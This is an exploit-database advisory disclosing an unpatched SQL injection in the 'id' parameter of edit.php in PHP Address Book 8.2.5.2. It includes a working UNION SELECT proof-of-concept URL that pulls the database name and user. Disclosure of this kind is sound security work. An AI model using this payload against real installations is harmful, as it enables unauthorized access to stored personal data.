PHP Address Book 8.2.5.2 SQL Injection Vulnerability

2015-11-18T00:00:00
ID 1337DAY-ID-24576
Type zdt
Reporter Rahul Pratap Singh
Modified 2015-11-18T00:00:00

Description

PHP Address Book version 8.2.5.2 suffers from a remote SQL injection vulnerability.

                                        
                                            ## Full Disclosure

#Exploit Title      : PHP Address Book SQL Injection Vulnerability
#Exploit Author     : Rahul Pratap Singh
#Date               : 14/Nov/2015
#Home Page Link     : http://sourceforge.net/projects/php-addressbook/
#Blog Url           : 0x62626262.wordpress.com
#Linkedin           : https://in.linkedin.com/in/rahulpratapsingh94
#Status             : Not Patched

1. Description

"id" field in edit.php is not properly sanitized, that leads to SQL
Injection Vulnerability.

2. Proof of Concept

http://php-addressbook.sourceforge.net/demo/edit.php?id=null' union
select
1,2,concat(0x3c2f7469746c653e,database(),0x3a,user(),0x3c62723e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--+

## Vendor Response

No reply from vendor

#  0day.today [2018-03-06]  #